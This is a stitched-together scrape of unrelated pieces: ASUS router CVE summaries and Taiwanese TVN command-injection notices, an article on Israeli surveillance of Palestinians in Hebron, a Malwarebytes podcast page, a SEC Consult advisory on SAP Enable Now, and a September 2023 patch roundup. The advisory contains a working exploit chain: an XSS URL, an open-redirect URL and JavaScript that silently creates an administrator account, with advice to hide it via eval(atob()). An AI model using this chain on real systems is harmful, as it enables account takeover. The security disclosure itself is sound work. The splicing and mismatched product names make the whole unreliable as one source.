An issue in ASUS RT-AX57 v.3.0.0.4_386_52041 allows a remote attacker to execute arbitrary code via a crafted request to the lan_ifname field in the sub_ln 2C318 function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-47005: Digging/ASUS/RT-AX57/3/1.md at main · XYIYM/Digging

An issue in ASUS RT-AX57 v.3.0.0.4_386_52041 allows a remote attacker to execute arbitrary code via a crafted request to the ifname field in the sub_4CCE4 function.

CVE-2023-47008: Digging/ASUS/RT-AX57/4/1.md at main · XYIYM/Digging

The West Bank was Israel’s surveillance laboratory. Since the Israel-Hamas war began, Palestinian residents have been locked in for days at a time.

On Sunday, October 29, Ahmed Azza was given permission to leave his neighborhood for the first time in three days. He passed the surveillance camera trained on his front door and the group of Israeli soldiers stationed on the hill above and walked eight minutes to the checkpoint at the end of his street. He placed his belongings on a table to be searched, made mandatory eye contact with the facial recognition camera, and crossed through the rotating metal barriers into Hebron. Ten hours later, he was given a one-hour window to return home before the checkpoint closed and he was locked out—or in—for the next two days.

Azza lives in Tel Rumeida, Hebron, the most tightly controlled neighborhood in the West Bank. Since 1997, Tel Rumeida has formed part of H2, a section of Hebron controlled by the Israeli government. Around 35,000 Palestinians and 850 Israeli settlers live in this area, where Israeli soldiers impose a system of segregation that heavily restricts the movement of Palestinians. It’s enforced with a network of surveillance that includes at least 21 manned checkpoints, on-the-spot searches, and watchtowers, plus a vast array of CCTV cameras dubbed “Hebron Smart City.” According to critics, the aim of this system is to make life as difficult as possible for Palestinians, slowly forcing them to leave their homes and make way for Israeli settlers.

The West Bank has long been seen as a testing ground for Israeli surveillance technology and tactics. Its defense exports have doubled in the past decade, partially thanks to the success of companies producing surveillance systems, like Elbit, Candiru, and Rafael, as well as NSO Group, which produces the Pegasus spyware. But on October 7, on the other side of Israel, the country’s famed surveillance network apparently failed. Hamas gunmen breached the high-tech border separating Gaza from Israel and murdered 1,400 people, taking more than 200 hostages. Since then, a growing sense of paranoia has given Israel’s government the impetus to ramp up restrictions and surveillance in the West Bank, according to analysts and activists working in the region.

“We’re rats in a lab,” says Azza, over a cup of tea at his workplace in Hebron. “I want to go to the beach, I want to see the sea, I want to taste the water. Here, we don't have this freedom.”

The flagship component of the West Bank’s surveillance infrastructure is known as “Wolf Pack.” According to Amnesty International, its purpose is to create a database featuring profiles of every Palestinian in the region. One strand of this software, known as Red Wolf, uses facial recognition cameras placed at checkpoints to inform Israeli soldiers via a color-coded system whether to arrest, detain, or allow through Palestinians who approach. If the system doesn’t recognize an individual, it will automatically enroll their biometric data into Red Wolf, without their knowledge.

Another strand, known as Blue Wolf, has been described as “Facebook for Palestinians.” It requires Israeli soldiers to photograph Palestinians individually via a smartphone app in order to record them in the database. According to Breaking the Silence, an NGO made up of former Israeli soldiers that opposes Israeli military occupation of Palestinian territories, prizes were offered to different units based on how many Palestinians they could photograph within a week.

A person crossing the street in Huwara, West Bank on November 04, 2023.Photograph: Dan Kitwood/Getty Images

“There are indications that the data gathered by this software impacts whether a person can get a work permit, whether a person can move from place to place within the West Bank, whether a person can get into Israel and work there or leave the country via Ben Gurion Airport, and a whole range of other things,” says Antony Loewenstein, author of _The Palestine Laboratory_, a book investigating the links between Israel’s military and technology sector.

According to Azza, as he approaches a checkpoint and is picked up by a facial recognition camera, Israeli soldiers can see his profile from up to 100 meters away. They know who he is, who his family members are, where he lives, and his entire history of interactions with them. When he was 16, Azza was arrested for allegedly having a knife, but he denied the allegations and was later found to be innocent. He says this data is displayed every time he passes a checkpoint, meaning he is unfairly targeted and sometimes detained for up to three hours at a time. In recent years, he’s begun pre-emptively stripping to his underwear each time he enters a checkpoint, to avoid the lengthy process of being searched multiple times. “It’s a violation of our privacy,” he says.

Israeli officials claim the rollout of surveillance technology helps contribute to a "frictionless" occupation, reducing contact between Palestinians and Israeli soldiers. Instead of troops frisking every Palestinian who passes a checkpoint, this tech allows them to target only those who have a “negative” history. Instead of conducting night raids to gain intelligence, Israeli soldiers can simply use drones to spy on the specific people they are interested in.

The Israeli Defense Force declined to provide an attributable comment.

Many of Israel’s key surveillance technologies have been developed and tested in the West Bank. Israel’s military has promoted close collaboration with the private tech sector, meaning that military-trained engineers are able to learn new skills from private companies. After leaving the military, they are often headhunted by the private sector.

“That’s a key aspect of the Israeli defense sector, showing that it’s possible to maintain and manage a brutal occupation for over half a century, which can then be exported like flat-pack repression to other nations across the globe,” says Loewenstein.

Since the war began on October 7, restrictions for Palestinians living in the West Bank have risen to unseen levels. Residents told me that now they are allowed to leave the neighborhood just three days per week. In addition to the curfew imposed in Tel Rumeida, raids against Palestinian militia groups have ramped up, and the number of Israeli soldiers on the streets has increased, due to the call-up of the army reserve. It's also meant some Israeli settlers are now donning their army reserve uniforms, blurring the contours of the state. Across the wider West Bank, at least 121 Palestinians have been killed by Israeli forces or settlers, according to the United Nations Office for the Coordination of Humanitarian Affairs.

“We are not just numbers,” says a doctor from Hebron, whose name has been withheld to protect his identity. During a break from his shift at Ramallah Hospital, he explains that he now lives locally, but his parents and siblings still live in Hebron. Normally, he’d spend his weekends visiting them, but in recent weeks he has been unable to travel due to delays caused by the closure of checkpoints across the region. Since October 7, he says, he’s treated two Palestinians who have been shot by Israeli forces. Three others who were also shot arrived at the emergency reception but were soon pronounced dead. “There’s a tragedy inside every single one of us in the medical team,” he says.

The task of investigating and documenting the killings of Palestinians in the West Bank has become more challenging in recent weeks. Normally carried out by NGOs such as Al-Haq—one of the key human rights organizations in the region—these groups have been unable to work properly due to the closure of checkpoints and the fear of violence enacted by Israeli settlers.

“Since the 7th of October, our field researchers have not been able to meet directly with victims or eyewitnesses because of the situation. They cannot move freely,” says Tahseen Elayyan, a legal researcher at Al-Haq, over a cup of coffee in their modest office in Ramallah’s Old Town. “Even before, they didn’t have full freedom, but now there are more restrictions on their movement and they’re sometimes afraid to go to areas because of settler attacks. We know about the killings, but we cannot document them properly.”

In October 2021, Al-Haq and a number of other human rights groups were controversially labeled terrorist organizations by the Israeli government. Weeks later, it was revealed by the NGO Front Line Defenders that six of them had previously had their devices hacked by Pegasus software. “They used technology and surveillance to control our work,” says Elayyan.

A question eliciting both fear and hope is whether surveillance technologies are even effective. Despite employing many of these systems across Gaza, Israeli security services were caught off guard by Hamas’ surprise attack on October 7. “On the one hand, we can talk about facial recognition technologies and how bad they are and how harmful they are for democracy, but on the other hand, you say to yourself, who wants to use them? What help did it give?” says Tehilla Shwartz Altshuler, a senior fellow at the Israel Democracy Institute think tank.

Ori Givati, a former Israeli soldier and advocacy director for Breaking the Silence, says the surveillance program is now out of control. “We have to differentiate between securing Israel, which is Israel’s duty and responsibility, and expanding the occupation. There is a huge difference. Occupying more doesn’t mean more security for Israel,” Givati says, “I don’t think that in the long term, if we now use more systems of surveillance against Palestinians, this is what brings us security. We cannot accept this because it doesn’t work.’

Intensified Israeli Surveillance Has Put the West Bank on Lockdown

This week on the Lock and Code podcast, we speak with Anna Brading and Mark Stockley from Malwarebytes about the apparent "appeal" of Little Brother surveillance, whether the tenets of privacy can ever fully defeat that surveillance, and what the possible merits of this surveillance could be.

_This week on the Lock and Code podcast…_

A worrying trend is cropping up amongst Americans, particularly within Generation Z—they’re spying on each other more.

Whether reading someone’s DMs, rifling through a partner’s text messages, or even rummaging through the bags and belongings of someone else, Americans _enjoy_ keeping tabs on one another, especially when they’re in a relationship. According to recent research from Malwarebytes, a shocking 49% of Gen Zers agreed or strongly agreed with the statement: “Being able to track my spouse’s/significant other’s location when they are away is extremely important to me.”

On the Lock and Code podcast with host David Ruiz, we’ve repeatedly tackled the issue of surveillance, from the NSA’s mass communications surveillance program exposed by Edward Snowden, to the targeted use of Pegasus spyware against human rights dissidents and political activists, to the purchase of privately-collected location data by state law enforcement agencies across the country. But the type of surveillance we’re talking about today is different. It isn’t so much “Big Brother”—a concept introduced in the socio-dystopian novel 1984 by author George Orwell. It’s “Little Brother.”

As far back as 2010, in a piece titled “Little Brother is Watching,” author Walter Kirn wrote for the New York Times:

>  “As the internet proves every day, it isn’t some stern and monolithic Big Brother that we have to reckon with as we go about our daily lives, it’s a vast cohort of prankish Little Brothers equipped with devices that Orwell, writing 60 years ago, never dreamed of and who are loyal to no organized authority. The invasion of privacy — of others’ privacy but also our own, as we turn our lenses on ourselves in the quest for attention by any means — has been democratized.”

Little Brother is us, recording someone else on our phones and then posting it on social media. Little Brother is us, years ago, Facebook stalking someone because they’re a college crush. Little Brother is us, watching a Ring webcam of a delivery driver, including when they are mishandling a package but also when they are doing a stupid little dance that we requested so we could post it online and get little dopamine hits from the Likes. Little Brother is our anxieties being _soothed_ by watching the shiny blue GPS dots that represent our husbands and our wives, driving back from work.

Little Brother isn’t just surveillance. It is increasingly popular, normalized, and accessible surveillance. And it’s creeping its way into more and more relationships every day. 

So, what can stop it? 

Today, we speak with our guests, Malwarebytes security evangelist Mark Stockley and Malwarebytes Labs editor-in-chief Anna Brading, about the apparent “appeal” of Little Brother surveillance, whether the tenets of privacy can ever fully defeat that surveillance, and what the possible merits of this surveillance could be, including, as Stockley suggested, in revealing government abuses of power. 

> “My question to you is, as with all forms of technology, there are two very different sides for this. So is it bad? Is it good? Or is it just oxygen now?” 

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

 Defeating Little Brother requires a new outlook on privacy: Lock and Code S04E23 

ASUS RT-AC86U’s authentication-related function has a vulnerability of insufficient filtering of special characters within its token-generated module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system, or terminate services.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311002

CVE ID

CVE-2023-41345

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

RT-AX55: 3.0.0.4.386.51598

問題描述

華碩 RT-AC86U 與驗證相關的產生token功能未對特殊參數作過濾，經驗證之遠端攻擊者可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並導致阻斷系統與終止服務。

解決方法

更新版本至3.0.0.4.386\_51948

漏洞通報者

資安人員

公開日期

2023-11-03

CVE-2023-41345: ASUS RT-AX55 - command injection - 1

ASUS RT-AC86U’s authentication-related function has a vulnerability of insufficient filtering of special characters within its check token module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311004

CVE ID

CVE-2023-41347

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

RT-AX55: 3.0.0.4.386.51598

問題描述

華碩 RT-AC86U 與驗證相關的確認token功能未對特殊參數作過濾，經驗證之遠端攻擊者可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並導致阻斷系統與終止服務。

解決方法

更新版本至3.0.0.4.386\_51948

漏洞通報者

資安人員

公開日期

2023-11-03

CVE-2023-41347: ASUS RT-AX55 - command injection - 3

ASUS RT-AC86U’s authentication-related function has a vulnerability of insufficient filtering of special characters within its code-authentication module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311005

CVE ID

CVE-2023-41348

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

RT-AX55: 3.0.0.4.386.51598

問題描述

華碩 RT-AC86U 與驗證相關的確認驗證碼功能未對特殊參數作過濾，經驗證之遠端攻擊者可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並導致阻斷系統與終止服務。

解決方法

更新版本至3.0.0.4.386\_51948

漏洞通報者

資安人員

公開日期

2023-11-03

CVE-2023-41348: ASUS RT-AX55 - command injection - 4

ASUS RT-AC86U’s authentication-related function has a vulnerability of insufficient filtering of special characters within its token-refresh module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311003

CVE ID

CVE-2023-41346

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

RT-AX55: 3.0.0.4.386.51598

問題描述

華碩 RT-AC86U 與驗證相關的更新token功能未對特殊參數作過濾，經驗證之遠端攻擊者可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並導致阻斷系統與終止服務。

解決方法

更新版本至3.0.0.4.386\_51948

漏洞通報者

資安人員

公開日期

2023-11-03

CVE-2023-41346: ASUS RT-AX55 - command injection - 2

SAP Enable Now Manager version 10.6.5 Build 2804 Cloud Edition suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >=======================================================================               title: Multiple Vulnerabilities             product: SAP® Enable Now Manager  vulnerable version: 10.6.5 (Build 2804) Cloud Edition       fixed version: May 2023 Release          CVE number: N/A (cloud)              impact: high            homepage: https://www.sap.com/about.html               found: 2022-10-21                  by: Paul Serban (Eviden)                      Fabian Hagg (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"SAP Enable Now solution provides advanced in-application help andtraining capabilities helping you to improve productivity and useradoption, as well as to increase satisfaction of the end-user experience.Create, maintain, and deliver in-application help, learning materials,and documentation content easily."Source: https://www.sapstore.com/solutions/41243/SAP-Enable-NowBusiness recommendation:------------------------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.SEC Consult recommends to perform a thorough security review conducted bysecurity professionals to identify and resolve potential further criticalsecurity issues.Vulnerability overview/description:-----------------------------------Multiple vulnerabilities were identified that could be chained together inorder to allow a remote, unauthenticated attacker to create new administrativeuser accounts by tricking the victim to click on a malicious link or visita malicious website prepared by the attacker.1) Open Redirect/URL Redirection VulnerabilityThe file download feature of the application contains an unvalidatedparameter value that exposes it to an open redirect vulnerability. Anattacker can create a malicious URL which would redirect the victim toa malicious site, for example, a phishing site convincing the victimto login once again.2) Reflected Cross Site Scripting (XSS)A reflected XSS vulnerability was found affecting the same parameter asused in 1). Due to insufficient input validation and output encoding, anattacker can inject arbitrary HTML or JavaScript code into the generatedserver response, executing it in the browser of the victim. The vulnerability,can be exploited, for example, to create new administrative user accountsin the application, thereby fully compromising the application. Any CSRFprotection can be bypassed by means of this vulnerability.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo implementation of CSRF protection was detected in the application.Using this vulnerability, an attacker can issue requests in the contextof administrative user sessions. This includes critical state changingactions such as user creation or role assignment. Note that in thetest environment the option 'Supported Functions' was set to value'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.Certain configurations require this setting to be enabled, e.g. to allowthe SEN Workflow Approver extension to submit the data on behalf of thelogged-in user to the SAP Enable Now Manager. Without this parameter,the extension will only be able to read the content and workflow information)This indicates that there is an insecure feature which allows the protectionmechanism to be disabled globally. It could not be clarified if this is thedefault setting. In any case, the function should still be enhanced to protectcritical actions such as functions used in user management or role/permissionmanagement even if the mechanism is disabled by configuration.Proof of concept:-----------------1) Open Redirect/URL Redirection VulnerabilityThe public endpoint /resources/open_file.html is vulnerable to anopen redirect via GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.comAfter browsing to the above link, the victim gets redirected towww.sec-consult.com in a new browser window opened by the embeddedcall of function window.open(). Note that both attacker and victimdo not have to be authenticated for successful exploitation.2) Reflected Cross-Site Scripting (XSS)The public endpoint /resources/open_file.html is affected by an XSSvulnerability in GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)After browsing to the above link, the domain property returns thedomain name of the server it was loaded from an alert window withinthe browser of the victim. This proves the successful execution of theinjected JavaScript code. In fact, any kind of JavaScript code couldbe injected by the attacker. Note that both attacker and victim donot have to be authenticated for successful exploitation.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo CSRF protection can be observed in POST requests sent between theclient and server. This includes at least the functions "task creation","user creation", "permission assignment" and "role/group assignment". Notethat this vulnerability appears to only affect systems where the CSRF protectionis disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'in the server settings. Although this setting can be reverted, it is advisedto have the protection enabled for critical operations such as user creationor permission assignment at any time (also when the option is set).Several of the vulnerabilities above can be chained together by anunauthenticated attacker. Considering the types of vulnerabilities,there are multiple exploitation scenarios. In our example we willcreate a link that, when clicked by an administrator victim, willcreate a new admin account. For this attack to work, we first needto gather some information. To create an account, we need to know twoimportant values: the OU and the UID. The OU represents the OrganizationalUnit unique identifier. The UID here represents the unique Group IDof our target group where we want our new user to be added. Performinga simple GET request to endpoint /self/group, both values can beobtained. The following listing shows the server response.------------------------------------------------------------------------------------------------HTTP/1.1 200Cache-Control: no-cache, no-store, must-revalidateExpires: 0Vary: OriginSet-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;Content-Type: text/json;charset=UTF-8Server: SAPConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 396{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086","ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU10C ","active":true}]}}------------------------------------------------------------------------------------------------Finally, in order for the attack to succeed, the attacker needsthe victim (logged in as administrator) to do first a request onthe above endpoint, then a POST request on the endpoint /!/userto actually create the new user account with the administratorrole assigned using the values taken from the previous response.These interactions can be scripted using the following ten linesof JavaScript code.------------------------------------------------------------------------------------------------var req1 = new XMLHttpRequest();req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);req1.withCredentials = true;req1.send();var obj = JSON.parse(req1.responseText).response;for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};var req2 = new XMLHttpRequest();req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);req2.withCredentials = true;req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));------------------------------------------------------------------------------------------------We can base64-encode this payload and pass it to the Javascript eval(atob())function using the XSS vulnerability in the file download feature (seen in 2.).The link could then be shortened to enhance the likelihood of successfulexploitation. This can be achieved, for example, by leveraging the Open Redirectvulnerability (seen in 1.) to redirect the victim to an attacker-controlledwebsite and trigger the above payload, making it an attack more likely tosucceed. If the victim is logged into the application and is part ofthe Administrator group, when they click on this link, a new adminaccount will be instantly created. The attacker then can log in and hasfull control over the application.Vulnerable / tested versions:-----------------------------The following versions of the software were found to be vulnerable during our tests:- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)Vendor contact timeline:------------------------2022-11-08: Contacting vendor via secure@sap.com2022-11-10: Vendor requested screenshots and steps to reproduce2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce             and screenshots weren't available at that time2022-11-10: Vendor confirmed issues are under review2022-11-18: Contacted vendor to request an update2022-11-18: Vendor confirmed issues are still under review2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to             the Engineering Team2023-02-02: Contacted vendor to request an update2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a             release schedule.2023-02-07: Vendor confirmed fix was deployed to production for ticket no #22801965642023-04-14: Contacted vendor to request update on ticket no #2280196563 fix2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release2023-05-08: Vendor confirmed fix was deployed to production for 22801965632023-09-27: Public release of security advisory.Solution:---------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF P. Serban, F. Hagg / @2023

SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect

Plus: Mozilla patches 10 Firefox bugs, Cisco fixes a vulnerability with a rare maximum severity score, and SAP releases updates to stamp out three highly critical flaws.

Fall is here, but hot zero-day summer shows no signs of cooling down, with the likes of Apple, Microsoft, and Google fixing flaws being used in real-life attacks.

Some major enterprise fixes were released during the month, including a Cisco patch for a vulnerability with a maximum CVSS score of 10.

Spyware has been a prominent trend over the past couple of months, and it’s a threat everyone should take seriously. Attacks can reach devices without any interaction from the user, so it’s important to keep your operating system up to date.

Here’s everything you need to know about the patches issued in September.

Apple iOS and iPad OS

Apple didn’t release any security updates in August, but the iPhone maker sure made up for it in September. First came iOS 16.6.1, an emergency security update released on September 9 to fix two flaws already being used in so-called “zero-click” attacks.

Reported by researchers at the University of Toronto’s Citizen Lab, the vulnerabilities were used to plant spyware via attachments containing malicious images in an iMessage, in an attack the researchers called BLASTPASS.

In mid-September, Apple released its major software upgrade, iOS 17, followed by iOS 17.0.1 a few days later. The surprise iOS 17.0.1 upgrade was important because it fixed another three iPhone flaws being used in spyware attacks.

Tracked as CVE-2023-41992 and reported by security researchers at Citizen Lab and Google, the first issue is a flaw in the kernel that could allow an attacker to escalate privileges. The other two vulnerabilities in WebKit and Security could potentially be chained together to take over a user’s device.

The flaws patched in iOS 17.0.1 were also fixed in the iOS 16.7 release for users of older iPhones or people who don’t want to upgrade to the latest software.

At the end of September, Apple released iOS 17.0.2 to fix some early iOS 17 bugs, and this is the latest version of the software, as of publication.

Apple has also released macOS Sonoma 14 to fix over 60 vulnerabilities.

Google Android

September was a big security month for Google’s Android users, with the monthly patch fixing 33 flaws, including one already being used in attacks. Tracked as CVE-2023-35674, the vulnerability in the framework could allow an adversary to elevate privileges without any interaction from the user. “There are indications that CVE-2023-35674 may be under limited, targeted exploitation,” Google said in its Android Security Bulletin.

Another severe issue is a critical security vulnerability in the system component that could lead to remote code execution with no additional execution privileges needed.

The Android security update has already reached Google’s own Pixel devices as well as Samsung devices, including the Galaxy S23 and S22 series.

Google Chrome

At the end of September, Google updated its Chrome browser after fixing 10 vulnerabilities, one of which was already being exploited by adversaries. Tracked as CVE-2023-5217 and rated as having a high impact, the already-exploited bug is a heap buffer overflow flaw in vp8 encoding in libvpx. “Google is aware that an exploit for CVE-2023-5217 exists in the wild,” the software giant said in an advisory.

The flaw was used in targeted spyware attacks, Google security researcher Maddie Stone later confirmed on Twitter.

Earlier in the month, Google fixed another zero-day flaw, a heap buffer overflow issue initially tracked as CVE-2023-4863, which it thought impacted only the Chrome browser. But two weeks after fixing the issue, researchers discovered it was worse than they thought, affecting the widely-used libwebp image library for rendering images in the WebP format.

Now tracked as CVE-2023-5129, it is thought the bug impacts every application that uses the libwebp library to process WebP images. “The scope of this vulnerability is much wider than initially assumed, affecting millions of different applications worldwide,” security firm Rezilion wrote in a blog.

The security outfit also thinks it is “highly likely” that the underlying issue in the libwebp library is the same issue resulting in CVE-2023-41064—one of the Apple flaws used as part of the BLASTPASS exploit chain to deploy the NSO Group’s Pegasus spyware.

Microsoft

Microsoft’s September Patch Tuesday is one to remember, as it fixed around 65 flaws, two of which are already being exploited by attackers. Tracked as CVE-2023-36761, the first is a Microsoft Word information disclosure vulnerability that could allow NTLM hashes to be exposed.

The second and most severe flaw is a privilege-escalation vulnerability in Microsoft Streaming Service Proxy tracked as CVE-2023-36802. An attacker who successfully exploited this vulnerability could gain system privileges, Microsoft said, adding that exploitation of the flaw has been detected.

Both flaws are marked as important, so it’s a good idea to update your devices as soon as you can.

Mozilla Firefox

Firefox has had a hectic month after Mozilla fixed 10 flaws in its privacy-conscious browser. CVE-2023-5168 is an out-of-bounds write bug in FilterNodeD2D1 affecting Firefox on Windows, rated as having a high impact.

CVE-2023-5170 is a flaw that could result in memory leak from a privileged process. This could be used to effect a sandbox escape if the correct data was leaked, Firefox owner Mozilla said in an advisory.

Meanwhile, CVE-2023-5176 covers memory safety bugs fixed in Firefox 118, Firefox ESR 115.3, and Thunderbird 115.3. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

Cisco

At the start of the month, Cisco issued a patch for a vulnerability in the single sign-on implementation of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform that could allow an unauthenticated, remote attacker to forge credentials to access an affected system. Tracked as CVE-2023-20238, the flaw has been given a maximum CVSS score of 10.

Also this month, Cisco patched a zero-day in Adaptive Security Appliance and Firepower Threat Defense software already exploited in Akira ransomware attacks. Tracked as CVE-2023-20269 and with a medium severity CVSS score of 5, the vulnerability in the remote access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a brute-force attack to identify valid username and password combinations.

SAP

Enterprise software firm SAP has issued several important fixes as part of its September Security Patch Day. This includes a patch for CVE-2023-40622, an information disclosure vulnerability in SAP BusinessObjects Business Intelligence Platform with a CVSS score of 9.9. “A successful exploit provides information that can be used in subsequent attacks, leading to a complete compromise of the application,” security firm Onapsis said.

CVE-2023-40309 is a missing authorization check issue in SAP CommonCryptoLib with a CVSS score of 9.8. The flaw can result in an escalation of privileges and in the worst case, attackers can compromise the affected application completely, Onapsis said.

Meanwhile, CVE-2023-42472 is an insufficient file type validation flaw in SAP BusinessObjects Business Intelligence Platform with a CVSS score of 8.7.

Tag

#asus